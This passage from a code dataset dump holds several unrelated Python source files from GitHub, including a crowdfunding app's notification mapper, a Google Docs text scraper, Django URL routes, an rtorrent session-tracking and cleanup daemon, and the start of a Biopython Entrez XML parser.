project_id)\n\n\n# Notifications Specccc\n# NewSeederNotification -> X funded your project\n# NewStageNotification_noncreator -> the project entered a given stage (similar to the one below)\n# NewStageNotification_creator -> the seer released the funds for a given stage to you\n# NewSeer_creator -> a seer was assigned to your project\n# NewSeer_seer -> a project was assigned to you to act as its seer\n# ChangeStateNotification -> the project entered funding, the project entered in-progress, the project was completed\n\n\ndef new_seeder(data):\n    project = 
data['project']\n    username = data['username']\n    return ('New seeder!', f'{username} has started funding {project}!')\n\n\ndef change_state(data):\n    project = data['project']\n    state = data['state']\n    if state == \"FUNDING\":\n        body = f'{project} is looking for new seeders!'\n    if state == \"IN_PROGRESS\":\n        body = f'{project} has started development!'\n    if state == \"COMPLETE\":\n        body = f'{project} has finished development!'\n    return ('New progress!', body)\n\n\ndef new_stage_non_creator(data):\n    project = data['project']\n    stage_number = data['stage_number']\n    return (\n        'Stage finished!',\n        f'{project} has started developing their Stage {stage_number}!',\n    )\n\n\ndef new_stage_creator(data):\n    project = data['project']\n    stage_number = data['stage_number']\n    name = data['username']\n    return (\n        'Stage funds released!',\n        f'{name} has released the funds for Stage {stage_number} of {project}!',\n    )\n\n\ndef new_seer_creator(data):\n    project = data['project']\n    name = data['username']\n    return ('Seer assigned!', f'{name} has been assigned as the {project} supervisor!')\n\n\ndef new_seer_seer(data):\n    project = data['project']\n    return ('Project assigned!', f'You\\'ve been assigned to supervise {project}!')\n\n\nTAG_MAPPER = {\n    'NewSeederNotification': new_seeder,\n    'NewStageNotification_noncreator': new_stage_non_creator,\n    'NewStageNotification_creator': new_stage_creator,\n    'NewSeer_creator': new_seer_creator,\n    'NewSeer_seer': new_seer_seer,\n    'ChangeStateNotification': change_state,\n}\n\n\n# Role Specccc\n# ProjectCreator\n# - Who subscribes? the creator of a project, upon creating it\n# - Which notifications do they receive? NewSeederNotification, NewStageNotification_creator, NewSeer_creator, ChangeStateNotification,\n# ProjectWatcher\n# - Who subscribes? the users who liked the project\n# - Which notifications do they receive? ChangeStateNotification,\n# ProjectSeer\n# - Who subscribes? the seer of a project\n# - Which notifications do they receive? NewSeederNotification, NewSeer_seer, ChangeStateNotification\n# ProjectSeeder\n# - Who subscribes? the users who invested in the project\n# - Which notifications do they receive? NewStageNotification_noncreator\n# Chat is NOT handled through subscriptions\n\n\nROLE_MAPPER = {\n    'ProjectCreator': [\n        'NewSeederNotification',\n        'NewStageNotification_creator',\n        'NewSeer_creator',\n        'ChangeStateNotification',\n    ],\n    'ProjectWatcher': ['ChangeStateNotification'],\n    'ProjectSeer': [\n        'NewSeederNotification',\n        'NewSeer_seer',\n        'ChangeStateNotification',\n    ],\n    'ProjectSeeder': ['NewStageNotification_noncreator'],\n}\n","repo_name":"JDSanto/frux-chat","sub_path":"frux_chat/services/notifications.py","file_name":"notifications.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29330832962","text":"from flask import request\nimport requests\n\nfrom logs.printLog import printLog\n\n'''\n    Retrieves text from view-only Google docs\n    Input: URL of google doc\n    Output: text of google doc\n'''\ndef acquireGoogle(url):\n    printLog(\"URL is \" + url)\n    r = requests.get(url)\n    content = r.text\n    intel = processGoogleIntel(content)\n\n    return intel\n\ndef processGoogleIntel(content):\n    splitIntel = content.split('DOCS_modelChunk = [')\n\n    intel = ''\n\n    for chunk in splitIntel:\n        bracketIndex = chunk.find('}')\n        sIndex = chunk.find('s\":\"')\n        chunk = chunk[sIndex + 4:bracketIndex]\n        intel += chunk\n\n    parsedIntel = intel.replace('\\\\n', '
    ')\n parsedIntel = parsedIntel.replace(\"\\\\u0027\", \"'\")\n parsedIntel = parsedIntel.replace('\\\\\"', '\"')\n parsedIntel = parsedIntel.replace('\\\\t', ' ')\n\n return parsedIntel","repo_name":"SarahCooperDev/Caper","sub_path":"models/mark_google.py","file_name":"mark_google.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4427646707","text":"from django.urls import path\n\nfrom users.views import UserRegisterAPIView, UserLoginAPIView, UserLogoutAPIView\n\napp_name = 'users'\n\nurlpatterns = [\n path('', UserRegisterAPIView.as_view(), name=\"list\"),\n path('login/', UserLoginAPIView.as_view(), name='login'),\n path('logout/', UserLogoutAPIView.as_view(), name='logout'),\n]","repo_name":"SageOfDev/DrfForTdd","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9674661179","text":"#!/usr/bin/python3.5\n\n# NOTES:\n# * Various features require 3.5+\n# * to install inotify library https://github.com/dsoprea/PyInotify\n# (i.e. https://pypi.python.org/pypi/inotify)\n# pip3 install --user inotify\n# git clone; cd; python3.5 setup.py install --user\n# * same with daemons (optional unless --daemon used)\n# https://github.com/kevinconway/daemons\n# https://pypi.python.org/pypi/daemons\n# pip3 install --user daemons\n\n# TODO:\n# * make logging work before and after daemonizing things so we get the PID in\n# the log file too\n# * fix resolve usages\n# * add config file?\n# * deal with duplicate hash's across trackers?\n# * if anything is in the retry queue, we'll never handle removed torrents. Not\n# sure if that is right or not.\n# * make an exception class and use it with errors so as not to break out of\n# loop except when an unexpected exception occurs\n# * better logging, especially with --clean\n# * better torrent bdecoding (i.e. keys etc to strings)\n# https://github.com/lostnihilist/bencode.py\n# https://github.com/fuzeman/bencode.py\n# * use better transaction handling to speed up insertions?\n\n\n#sys.argv.extend(('-v', '-v', '-v', '-r', '-n', '~/.config/rtorrent/session', '~/files', '~/seed'))\nimport argparse\nimport logging\nimport math\nimport os\nimport re\nimport sqlite3\nimport string\nimport sys\nimport time\n\nfrom collections import deque, namedtuple, OrderedDict\nfrom math import ceil\nfrom pathlib import Path, PosixPath\nfrom urllib.parse import urlparse\n\nimport bencode\n\nfrom inotify.adapters import Inotify\nfrom inotify.constants import IN_CREATE, IN_DELETE\n\n# not available in 3.5 on whatbox, fuck these people, and no pip\n#from chardet import detect\n\n\nLOG_FILE = Path(\"~/.config/rtorrent_event/event.log\")\nSQL_FILE = Path(\"~/.config/rtorrent_event/file.db\")\nHOOK_FILE = \"~/.config/rtorrent_event/hooks.py\"\nPID_FILE = Path(\"~/.local/var/run/rtorrent_event.pid\").expanduser()\nSLEEP_TIME = 3 #seconds\n\ndef adapt_path(path):\n \"Convert PosixPath to appropriate type for sqlite, i.e. 
a string\"\n return str(path).encode('utf-8')\n\ndef convert_path(s):\n \"from bytes from sqlite db to PosixPath\"\n return PosixPath(s.decode('utf-8'))\n\nsqlite3.register_adapter(Path, adapt_path)\nsqlite3.register_adapter(PosixPath, adapt_path)\nsqlite3.register_converter(\"path\", convert_path)\n\nclass rTorEventException(Exception):\n pass\n\nclass rTorFileNotFoundError(rTorEventException):\n pass\n\nRmTuple = namedtuple('RmTuple',\n ('name', 'tracker', 'hash', 'rmfiles', 'torfiles', 'tor',\n 'ltor', 'rtor'))\n\ndef parse_args():\n p = argparse.ArgumentParser(\n description=\"Scan folders and rtorrent session, removing unused files.\")\n p.add_argument('session', action='store',\n help=\"rtorrent session folder location.\")\n p.add_argument('paths', nargs='*', action='store', default=(),\n help=\"Paths to remove files from and/or check db against.\")\n me = p.add_mutually_exclusive_group()\n me.add_argument('--clean', action='store_true',\n help=\"\"\"\n Scan the FS and DB for conflicting information and remove\n rows from DB to make consistent. Rtorrent needs to not be\n running or will exit without action, unless --force given.\n Cannot be run in daemon mode. Use with --remove to remove\n orphaned files (files on disk but not in db). Paths are\n required when specified.\n \"\"\")\n me.add_argument('-d', '--daemon', action='store_true',\n help=\"\"\"\n Fork off to a daemon, implies \"--sleep --log '%s'\",\n unless --log/--sleep are specified.\n \"\"\" % LOG_FILE)\n p.add_argument('-f', '--force', action='store_true',\n help=\"Clean up even if rtorrent is running.\")\n p.add_argument('--log-file', action='store', default=LOG_FILE,\n help=\"What file to use as log file, defaults to %s.\" %\n str(LOG_FILE))\n p.add_argument('--no-log', action='store_true',\n help=\"do not write a log file.\")\n p.add_argument('-q', '--quiet', action='store_true',\n help=\"suppress output on stdout/stderr. Does not effect log file.\")\n p.add_argument('-n', '--no-action', action='store_true',\n help=\"\"\"\n Print what would happen, but do not execute. Cannot use\n --daemon.\n \"\"\")\n p.add_argument('-r', '--remove', action='store_true',\n help=\"\"\"\n Remove files on disk if no longer in db, during normal\n operation or in --clean. This is effectively the last\n pre_remove hook run before removing data from database. By\n default, any \"orphaned\" files are removed, but if paths\n arguments are specified, only files in those directories\n that are orphaned will be removed. \"Orphaned\" means that\n the files are no longer associated with any torrents.\n \"\"\")\n p.add_argument('--sleep', action='store', type=int, default=SLEEP_TIME,\n help=\"\"\"\n How long to sleep when no fs action is detected (seconds).\n Default: %(default)s\n \"\"\")\n p.add_argument('--sql-file', action='store', default=SQL_FILE, type=Path,\n help=\"Where to store history. Default: %s\" % str(SQL_FILE))\n p.add_argument('-v', '--verbose', action='count', default=0,\n help=\"Enable higher verbosity levels (up to 4 times).\")\n p.add_argument('--hooks', nargs='?', action='store', default=None,\n const=HOOK_FILE,\n help=\"\"\"\n A file of python code with hook functions to run. If\n argument specified without argument, '%s' is used as the\n hook file. See README for details on the hooks. \n \"\"\" % HOOK_FILE)\n p.add_argument('--clean-lockfile', action='store_true',\n help=\"Remove a lockfile. 
I DO NOT CHECK IF IT IS STALE!\")\n args = p.parse_args()\n args.paths = tuple(Path(x).expanduser().resolve() for x in args.paths)\n args.session = Path(args.session).expanduser()\n args.sql_file = args.sql_file.expanduser()\n if not args.session.is_dir():\n p.error(\"Session directory must exist and be a directory.\")\n if not all(x.is_dir() for x in args.paths):\n p.error(\"Paths must exist and be a directories.\")\n if args.daemon and args.no_action:\n p.error(\"Can only specify one of --no-action and --daemon.\")\n args.log_file = args.log_file.expanduser() if not args.no_log else None\n if args.hooks:\n args.hooks = Path(args.hooks).expanduser()\n if not args.hooks.exists():\n p.error(\"Hook file must exist if specified.\")\n if args.clean and not args.paths:\n p.error(\"Paths must be specified with --clean.\")\n return args\n\ndef is_parent(parent, child):\n \"is candidate parent an actual parent of child (Paths or strings\"\n return os.path.commonpath((str(parent), str(child))) == str(parent)\n\ndef common_parent(*files, are_absolute=False):\n \"\"\"\n get the deepest directory common to all files/directories.\n\n all files must exist while call is executing\n \"\"\"\n if not files:\n return None\n if not are_absolute:\n files = [x.absolute() for x in files]\n base_dir = files[0] if files[0].is_dir() else files[0].parent\n for cmpfile in files:\n for i, (bp, cp) in enumerate(zip(base_dir.parts, cmpfile.parts)):\n if bp != cp:\n if i < 0:\n return None\n # have to map from parts idx to parents idx, annoying\n parent_idx = len(base_dir.parts) - 1 - i\n base_dir = base_dir.parents[parent_idx]\n return base_dir\n\ndef tabnew_line_join(objs):\n \"join objs with newline, prepending each line with tab\"\n return '\\n'.join('\\t%s' % str(x) for x in objs)\n\ndef human_filesize(size, binary=True, digits=1, unit=None, bits=False,\n inbinary=True, inunit='', inbits=False):\n \"\"\"\n convert number of bytes to human readable size as string\n\n binary: use 1024 system. False to use decimal. iB versus B in output\n digits: how many digits after decimal point to report\n unit: None to determine automatically, else one of KMGTPEZ,\n '' for Bytes.\n bits: output in bits or bytes (default: bytes) (b vs B in output)\n inbinary: input in binary, applies only if inunit != ''\n inunit: '' for bytes, KMGTPEZ for higher order\n inbits: is the input in bits or bytes. 
default bytes\n \"\"\"\n fmt = \"%%1.%df %%s%%s\" % digits\n units = ('', 'K', 'M', 'G', 'T', 'P', 'E', 'Z')\n divsuf = [(1000, 'B'), (1024, 'iB')]\n size *= divsuf[inbinary][0]**units.index(inunit) / (1,8)[inbits]*(1,8)[bits]\n div, suf = divsuf[binary]\n if size <= 0: # log(0) undefined\n unit = ''\n unit = (unit if unit is not None else\n units[min(math.floor(math.log(size, div)), len(units)-1)])\n size /= div ** units.index(unit)\n unit = unit if unit != 'K' or binary else 'k' # strictly, in SI k not K\n suf = 'B' if unit == '' else suf\n suf = suf.lower() if bits else suf\n return fmt % (size, unit, suf)\n\ndef build_fs_file_set(*paths):\n \"Return a set of PosixPath objects representing the files in paths\"\n s = set()\n for path in paths:\n for pd, ds, fs in os.walk(str(path)):\n s.update(Path(pd, f).resolve() for f in fs)\n return s\n\ndef get_tor_meta(base_torrent_file, args):\n \"return name, tracker, and list of files associated with base_torent_file\"\n tord = bencode.bread(str(base_torrent_file))\n rtord = bencode.bread(str(base_torrent_file) + '.rtorrent')\n try:\n base_dir = Path(rtord['directory']).expanduser().resolve()\n except FileNotFoundError:\n raise rTorFileNotFoundError(\"No data found for: %s\" %\n base_torrent_file.stem)\n single_file_torrent = 'files' not in tord['info']\n name = tord['info']['name']\n if \"announce\" in tord:\n trackerp = urlparse(tord['announce'])\n tracker = trackerp.hostname if trackerp.hostname else trackerp.netloc\n elif \"announce-list\" in tord:\n trackerp = urlparse(tord['announce-list'][0][0])\n tracker = trackerp.hostname if trackerp.hostname else trackerp.netloc\n else:\n tracker = \"No Tracker\"\n # in multi file torrents, rtorrent adds the name to the base_dir already\n if single_file_torrent:\n return name, tracker, [base_dir / name]\n else:\n return name, tracker, [base_dir / Path(*file['path'])\n for file in tord['info']['files']]\n\ndef create_tables(file):\n \"create sqlite db at file, creating subdirectories if necessary\"\n logging.debug(\"Creating database tables and indexes at '%s'.\" % str(file))\n os.makedirs(str(file.parent), exist_ok=True)\n conn = sqlite3.connect(str(file))\n with conn:\n conn.execute('''\n CREATE TABLE torrent_data (\n hash text PRIMARY KEY,\n name text,\n tracker text,\n torrent blob,\n libtorrent blob,\n rtorrent blob\n );''')\n conn.execute('''\n CREATE TABLE session_files (\n hash text NOT NULL,\n file path NOT NULL,\n PRIMARY KEY (hash, file),\n FOREIGN KEY (hash) REFERENCES torrent_data(hash)\n );''')\n conn.execute('''CREATE INDEX sff ON session_files(file);''')\n conn.execute('''CREATE INDEX sfh ON session_files(hash);''')\n conn.commit()\n conn.close()\n\ndef populate_session_tbl(con, sessfldr, no_action, args=None):\n \"populate db with rtorrent session files found in sessfldr\"\n for file in sessfldr.glob('*.torrent'):\n try:\n name, tracker, torfiles = get_tor_meta(file, args)\n except rTorFileNotFoundError:\n logging.warning(\"No data found for hash: %s\" % file.stem)\n continue\n add_new_session_file(con, file, name, tracker, torfiles, no_action,\n args=args, commit=False)\n if not no_action:\n con.commit()\n\ndef add_new_session_file(con, file, name, tracker, tor_files, no_action,\n args=None, commit=True):\n \"add session file found at file with name, tracker, and file list to db\"\n hash = file.stem\n with con:\n c = con.execute('SELECT 1 FROM torrent_data WHERE hash = ?', (hash,))\n if c.fetchall():\n c.close()\n logging.debug(\"Hash already present: %s\" % hash)\n return\n 
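        # A possible alternative (a sketch, not this module's actual code,
        # assuming plain sqlite3): the SELECT duplicate check above plus the
        # INSERT further below can race if two writers ever share the db;
        # sqlite's INSERT OR IGNORE would collapse both into one statement:
        #
        #   con.execute("INSERT OR IGNORE INTO torrent_data "
        #               "(hash, name, tracker, torrent, libtorrent, rtorrent) "
        #               "VALUES (?, ?, ?, ?, ?, ?);",
        #               (hash, name, tracker, tord, ltord, rtord))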
c.close()\n logging.info(\"Adding hash, name, tracker to db: %s, '%s', %s\" %\n (hash, name, tracker))\n tf_str = \"Adding files:\\n%s\" % tabnew_line_join(tor_files)\n if no_action:\n print(tf_str)\n return\n logging.debug(tf_str)\n with con:\n with open(str(file), 'rb') as fd:\n tord = fd.read()\n with open(str(file.with_suffix('.torrent.libtorrent_resume')), 'rb') as fd:\n ltord = fd.read()\n with open(str(file.with_suffix('.torrent.rtorrent')), 'rb') as fd:\n rtord = fd.read()\n con.execute(\"\"\"\n INSERT INTO torrent_data\n (hash, name, tracker, torrent, libtorrent, rtorrent)\n VALUES (?, ?, ?, ?, ?, ?);\n \"\"\", (hash, name, tracker, tord, ltord, rtord))\n con.executemany('INSERT INTO session_files (hash, file) VALUES (?, ?)',\n ((hash, tf) for tf in tor_files))\n if commit:\n con.commit()\n\ndef check_rtorrent_running(sessiondir, force):\n \"check if running, raise if force is False and running.\"\n lock_file = sessiondir / 'rtorrent.lock'\n rt_running = lock_file.exists()\n if not rt_running:\n return True\n if force and rt_running:\n logging.warning(\"Rtorrent is still running, but continuing.\")\n return False\n elif not force and rt_running:\n raise SystemExit(\"Rtorrent is still running. -f to force.\")\n\ndef qfunc_create(con, path, args, queues):\n logging.debug(\"Processing file: %s\" % str(path))\n try:\n hooks_and_add_torrent(con, path, args)\n except rTorFileNotFoundError:\n logging.warning(\"No data found for: %s\" % path.stem)\n queues['retry_create'].append(path)\n\ndef qfunc_retry_create(con, path, args, queues):\n try:\n hooks_and_add_torrent(con, path, args)\n except rTorFileNotFoundError:\n queues['retry_create'].append(path)\n\ndef handle_remove_torrent(con, file, no_action, args=None):\n \"\"\"\n remove torrent associated with session file from db\n\n run rm_file_hook if args.remove is True\n \"\"\"\n hash = file.stem\n try:\n c = con.execute('''SELECT name, tracker, torrent, libtorrent, rtorrent\n FROM torrent_data WHERE hash = ?''', (hash,))\n name, tracker, tor, ltor, rtor = c.fetchall()[0]\n # all files associated with torrent\n c.execute('SELECT file FROM session_files WHERE hash = ?', (hash,))\n torfiles = [x for (x,) in c.fetchall()]\n except IndexError:\n logging.error(\"Hash to remove not in db: %s\" % hash)\n raise rTorEventException(\"Hash to remove not in db: %s\" % hash)\n else:\n logging.info(\"Remove hash, name, tracker from db: %s, '%s', %s\" %\n (hash, name, tracker))\n if args.remove:\n rmfiles = rm_file_hook(con, file, args)\n else:\n rmfiles = []\n finally:\n c.close()\n with con:\n con.execute('DELETE FROM session_files WHERE hash = ?;', (hash,))\n con.execute('DELETE FROM torrent_data WHERE hash = ?;', (hash,))\n con.commit()\n return RmTuple(name, tracker, hash, rmfiles, torfiles, tor, ltor, rtor)\n\ndef rm_file_hook(con, file, args):\n \"\"\"\n remove files associated with session file file from disk.\n\n if args.paths is non-empty, files must be a child of one path\n \"\"\"\n hash = file.stem\n # which files do not have a match\n c = con.execute('''SELECT f.file FROM\n session_files f\n LEFT JOIN session_files s\n ON s.file = f.file AND s.hash <> f.hash\n WHERE s.file IS NULL AND f.hash = ?;''', (hash,))\n rmfiles = [x for (x,) in c.fetchall()\n if not args.paths or any(is_parent(p, x) for p in args.paths)]\n c.execute('SELECT count(*) FROM session_files WHERE hash = ?', (hash,))\n file_count = c.fetchall()[0][0]\n c.close()\n done_rmfiles, rmsize = rm_files(rmfiles, args.no_action, args.paths)\n fmt_str = \"Rm stats for hash %s 
removed/removable/total/size: %d/%d/%d/%s\"\n if args.no_action:\n print(fmt_str % (hash, len(done_rmfiles), len(rmfiles), file_count,\n human_filesize(rmsize)))\n else:\n logging.info(fmt_str % (hash, len(done_rmfiles), len(rmfiles),\n file_count, human_filesize(rmsize)))\n return(done_rmfiles)\n\ndef remove_missing_hashes(con, sessfldr, no_action, args=None):\n fs_hashes = set(f.stem for f in sessfldr.glob('*.torrent'))\n with con:\n c = con.execute('SELECT DISTINCT hash, name, tracker FROM torrent_data;')\n db_hash_data = {x[0]:x[1:] for x in c.fetchall()}\n c.close()\n rm_hashes = db_hash_data.keys() - fs_hashes\n if not rm_hashes:\n return rm_hashes\n rm_data = [\"%s, '%s', %s\" % t for t in\n sorted([(k, *db_hash_data[k]) for k in rm_hashes],\n key=lambda x: x[1])]\n if no_action:\n print(\"Remove hashes from db:\\n%s\" % tabnew_line_join(rm_data))\n return rm_hashes\n with con:\n logging.info(\"Remove hashes from db:\\n%s\" % tabnew_line_join(rm_data))\n con.executemany('DELETE FROM session_files WHERE hash = ?',\n ((h,) for h in rm_hashes))\n con.executemany('DELETE FROM torrent_data WHERE hash = ?',\n ((h,) for h in rm_hashes))\n return rm_hashes\n\ndef clean_tables(con, no_action, fs_file_set, args=None):\n \"Remove files in db not found on fs.\"\n with con:\n c = con.execute('SELECT DISTINCT file FROM session_files;')\n db_file_set = {x for (x,) in c.fetchall()}\n c.close()\n rmfiles = sorted(db_file_set - fs_file_set)\n with con:\n if rmfiles:\n if no_action:\n print(\"Remove from session:\\n'%s'\" % tabnew_line_join(rmfiles))\n return\n logging.info(\"Remove from session:\\n'%s'\" % tabnew_line_join(rmfiles))\n try:\n if rmfiles:\n c = con.execute(\"DELETE FROM session_files WHERE file IN (%s)\" %\n ', '.join(('?') * len(rmfiles)), rmfiles)\n rmcount = c.rowcount\n c.close()\n else:\n rmcount = 0\n except sqlite3.Error as e:\n logging.exception(\"Error while removing from session_files\")\n\n else:\n logging.debug(\"Removed %d rows from session_files\" % rmcount)\n try:\n hashrm = con.execute(\"\"\"DELETE FROM torrent_data WHERE hash IN\n (SELECT t.hash FROM torrent_data t\n LEFT JOIN session_files s ON s.hash = t.hash\n WHERE s.hash IS NULL);\n \"\"\").rowcount\n except sqlite3.Error as e:\n logging.exception(\"Error removing from torrent_data\")\n hashrm = -1\n logging.info(\"Removed %d rows from torrent_data table\" % hashrm)\n con.commit()\n\ndef rm_files(files, no_action, parent_paths, log_level='debug'):\n \"\"\"\n rm sequence of files and return list of files and total size removed\n\n no_action: just print what would happen\n parent_paths: only remove if the file is in one of the listed parent paths\n log_level: at what level log level to print normal file rm op\n \"\"\"\n logger = getattr(logging, log_level)\n success, rm_size = deque(), 0\n com_par = common_parent(*files)\n for file in files:\n if parent_paths and not any(is_parent(p, file) for p in parent_paths):\n continue\n if no_action:\n print(\"Remove from fs: '%s'\" % str(file))\n success.append(file)\n rm_size += file.stat().st_size\n continue\n try:\n logger(\"Remove from fs: '%s'\" % str(file))\n fsize = file.stat().st_size\n file.unlink()\n except (OSError, IOError) as e:\n logging.exception(\"Could not remove file from fs: '%s'\" % str(file))\n else:\n success.append(file)\n rm_size += fsize\n else:\n if (com_par is not None and not no_action and parent_paths and\n any(is_parent(p, com_par) for p in parent_paths)):\n try:\n com_par.rmdir()\n except (OSError, PermissionError):\n pass\n else:\n 
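                # try/else: this branch runs only when rmdir() above raised
                # nothing, i.e. the now-empty common parent dir was removed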
logger(\"Removed dir from fs: '%s'\" % str(com_par))\n success.appendleft(com_par)\n return list(success), rm_size\n\ndef remove_orphan_files(con, no_action, fs_file_set, args=None):\n \"remove files on disk not found in db\"\n with con:\n c = con.execute('SELECT DISTINCT file FROM session_files;')\n db_file_set = {x for (x,) in c.fetchall()}\n c.close()\n rm_files(sorted(fs_file_set - db_file_set), no_action, args.paths, 'info')\n\ndef prune_empty_directories(*dirs):\n \"Delete a tree of empty directories, will not delete dirs passed in.\"\n for dir in dirs:\n for d, ds, fs in os.walk(str(dir), topdown=False):\n if d == dir:\n break\n try:\n os.rmdir(d)\n except OSError:\n pass\n else:\n logging.info(\"Removed empty directory: '%s'\" % d)\n\ndef import_user(file):\n \"import a user python file that is not on path as if it were a module\"\n import importlib.machinery\n import importlib.util\n logging.debug(\"Import %s\" % str(file))\n loader = importlib.machinery.SourceFileLoader('hooks', str(file))\n spec = importlib.util.spec_from_loader(loader.name, loader)\n hooks = importlib.util.module_from_spec(spec)\n loader.exec_module(hooks)\n return hooks\n\ndef hooks_and_add_torrent(con, path, args):\n \"handle a new torrent file by running hooks and adding to db\"\n try:\n name, tracker, torfiles = get_tor_meta(path, args)\n except FileNotFoundError:\n return False\n hook = getattr(hooks, 'pre_add', None)\n if hook:\n logging.debug(\"Running pre_add.\")\n hook(con, path, args)\n add_new_session_file(con, path, name, tracker, torfiles, args.no_action,\n args=args)\n hook = getattr(hooks, 'post_add', None)\n if hook:\n logging.debug(\"Running post_add.\")\n hook(con, path, args)\n return True\n\ndef hooks_and_remove_torrent(con, path, args, queues):\n \"\"\"\n handle new removal of a torrent file by running hooks, removing from db\n\n rm files if args.remove is True via rm_file_hook\n \"\"\"\n logging.debug(\"Removed file: %s\" % str(path))\n hook = getattr(hooks, 'pre_remove', None)\n if hook:\n logging.debug(\"Running pre_remove.\")\n hook(con, path, args)\n rmtup = handle_remove_torrent(con, path, args.no_action, args=args)\n hook = getattr(hooks, 'pre_remove', None)\n if hook:\n logging.debug(\"Running post_remove.\")\n hook(con, path, args, rmtup)\n\ndef setup_logging(args):\n formatter = logging.Formatter('%(asctime)s - %(levelname)s: %(message)s')\n rootlog = logging.getLogger()\n loglevel = logging.ERROR - 10 * args.verbose\n rootlog.setLevel(loglevel)\n if not args.quiet and not args.daemon:\n console = logging.StreamHandler()\n console.setFormatter(formatter)\n console.setLevel(loglevel)\n rootlog.addHandler(console)\n if args.log_file:\n logfile = logging.FileHandler(str(args.log_file))\n logfile.setFormatter(formatter)\n logfile.setLevel(loglevel)\n rootlog.addHandler(logfile)\n if args.quiet and not args.log_file:\n rootlog.disabled = True\n\ndef inotify_loop(con, inot, args, queues, qfuncs, inot_funcs):\n \"loop over inotify event generator and dispatch as necessary\"\n for event in inot.event_gen():\n if event is None:\n for key in queues:\n if queues[key]:\n f = queues[key].popleft()\n qfuncs[key](con, f, args, queues)\n break\n else:\n logging.debug(\"Sleeping for %d\" % args.sleep)\n time.sleep(args.sleep) # sleep only when nothing to do\n continue\n header, type_names, watch_path, filename = event\n logging.debug(\"EVENT: %s\" % (event,))\n if filename.lower().endswith('.new'):\n filename = filename[:-4]\n path = Path(watch_path, filename)\n inot_key = (path.suffix[1:], 
tuple(type_names))\n if inot_key in inot_funcs:\n inot_funcs[inot_key](path)\n\ndef inotify(args):\n \"Setup to run inotify loop\"\n setup_logging(args)\n inot = Inotify()\n inot.add_watch(str(args.session), mask=IN_CREATE ^ IN_DELETE)\n global hooks\n if args.hooks:\n hooks = import_user(args.hooks)\n else:\n hooks = None\n try:\n con = sqlite3.connect(str(args.sql_file),\n detect_types=sqlite3.PARSE_DECLTYPES)\n logging.info(\"Repopulating database.\")\n populate_session_tbl(con, args.session, args.no_action, args=args)\n queues = OrderedDict((('create',deque()),\n ('retry_create',deque()),\n ('remove',deque())))\n qfuncs = {'create':qfunc_create,\n 'retry_create':qfunc_retry_create,\n 'remove':hooks_and_remove_torrent}\n inot_funcs = {('torrent', ('IN_CREATE',)) : queues['create'].append,\n ('torrent', ('IN_DELETE',)) : queues['remove'].append\n }\n complete_hook = getattr(hooks, 'complete', None)\n if complete_hook:\n queues['complete'] = deque()\n inot_funcs[('complete', ('IN_CREATE',))] = queues['complete'].append\n qfuncs['complete'] = complete_hook\n logging.info(\"Entering inotify loop.\")\n preloop_hook = getattr(hooks, 'pre_loop', None)\n if preloop_hook:\n preloop_hook(con, inot, args, queues, qfuncs, inot_funcs)\n queues.move_to_end('remove')\n while True:\n try:\n inotify_loop(con, inot, args, queues, qfuncs, inot_funcs)\n except rTorEventException as e:\n logging.exception(\"Something happened.\")\n except (KeyboardInterrupt, SystemExit):\n logging.info(\"Exiting due to interrupt.\")\n raise\n except Exception:\n logging.exception(\"Unhandled exception.\")\n raise\n finally:\n postloop_hook = getattr(hooks, 'post_loop', None)\n if postloop_hook:\n postloop_hook(con, inot, args)\n inot.remove_watch(bytes(args.session))\n con.close()\n\ndef inotify_withlock(args, lockfile_path):\n try:\n lockfile = open(str(lockfile_path), 'x')\n lockfile.write(str(os.getpid()))\n lockfile.close()\n except FileExistsError:\n logging.error(\"Lock file exists. \"\n \"Check to see if another instance is running. \"\n \"If not, run with --clean-lockfile to remove the stale lockfile.\",\n file=sys.stderr)\n exit(1)\n else:\n inotify(args)\n finally:\n lockfile_path.unlink()\n\ndef clean(args, lockfile_path):\n \"\"\"\n make sure db synced with fs, and fs with db if args.remove is True.\n\n preferably with rtorrent not running\n \"\"\"\n setup_logging(args)\n try:\n lockfile = open(str(lockfile_path), 'x')\n lockfile.write(str(os.getpid()))\n lockfile.close()\n except FileExistsError:\n logging.error(\"Lock file exists. \"\n \"Check to see if another instance is running. 
\"\n \"If not, run with --clean-lockfile to remove the stale lockfile.\")\n exit(1)\n else:\n con = sqlite3.connect(str(args.sql_file),\n detect_types=sqlite3.PARSE_DECLTYPES)\n check_rtorrent_running(args.session, args.force)\n populate_session_tbl(con, args.session, args.no_action, args=args)\n remove_missing_hashes(con, args.session, args.no_action, args=args)\n fs_file_set = build_fs_file_set(*args.paths)\n clean_tables(con, args.no_action, fs_file_set, args=args)\n if args.remove:\n remove_orphan_files(con, args.no_action, fs_file_set, args=args)\n if not args.no_action:\n prune_empty_directories(*args.paths)\n if not args.no_action:\n logging.debug(\"Vacuum database.\")\n con.execute('VACUUM;')\n con.commit()\n con.close()\n finally:\n lockfile_path.unlink()\n\ndef main(args):\n \"do work depending on args\"\n lockfile_path = PID_FILE\n if args.clean_lockfile and lockfile_path.exists():\n lockfile_path.unlink()\n if args.clean:\n clean(args, lockfile_path)\n elif args.daemon:\n from daemons import daemonizer\n dmn = daemonizer.run(pidfile=str(PID_FILE))(inotify)\n dmn(args)\n else:\n inotify_withlock(args, lockfile_path)\n\n","repo_name":"lostnihilist/rtorrent_event","sub_path":"rtorrent_event/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":30039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24534258986","text":"import sys\nimport os\nimport warnings\nfrom collections import Counter\nfrom xml.parsers import expat\nfrom io import BytesIO\nimport xml.etree.ElementTree as ET\nfrom xml.sax.saxutils import escape\n\n# Importing these functions with leading underscore as not intended for reuse\nfrom Bio._py3k import urlopen as _urlopen\nfrom Bio._py3k import urlparse as _urlparse\nfrom Bio._py3k import unicode\nfrom Bio._py3k import raise_from as _raise_from\n\n\n# The following four classes are used to add a member .attributes to integers,\n# strings, lists, and dictionaries, respectively.\n\n\nclass NoneElement:\n \"\"\"NCBI Entrez XML element mapped to None.\"\"\"\n\n def __init__(self, tag, attributes, key=None):\n \"\"\"Create a NoneElement.\"\"\"\n self.tag = tag\n if key is None:\n self.key = tag\n 